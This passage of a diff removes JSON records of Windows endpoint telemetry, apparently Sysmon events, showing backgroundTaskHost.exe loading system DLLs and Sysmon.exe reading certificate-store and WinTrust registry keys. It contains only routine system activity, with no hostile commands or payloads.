- "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "wldp.dll", - "image_path": "C:\\Windows\\System32\\wldp.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "OneCoreUAPCommonProxyStub.dll", - "image_path": "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "biwinrt.dll", - "image_path": "C:\\Windows\\System32\\biwinrt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690270000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ContentDeliveryManager.Background.dll", - "image_path": "C:\\Windows\\SystemApps\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\ContentDeliveryManager.Background.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690580000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 